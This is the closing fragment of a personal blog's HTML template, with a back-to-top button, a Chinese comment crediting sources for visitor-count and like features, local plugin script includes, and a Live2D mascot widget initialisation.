			$("#motto-author").html( mottoTextFrom  );
		})();	
	</script>	



<!-- love effect -->


<!-- back to top -->

	<div id="totop">
	<span class="icon-circle-up"></span>
</div>



<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<!-- leancloud -->


	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->


	

  



<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imagelazyloader/yall.min.js"></script>
<script src="/plugin/imageloaded/imagesloaded.pkgd.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/plugin/resizediv/resizediv.js"></script>
<script src="/js/main.js"></script>

	<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>	
</html>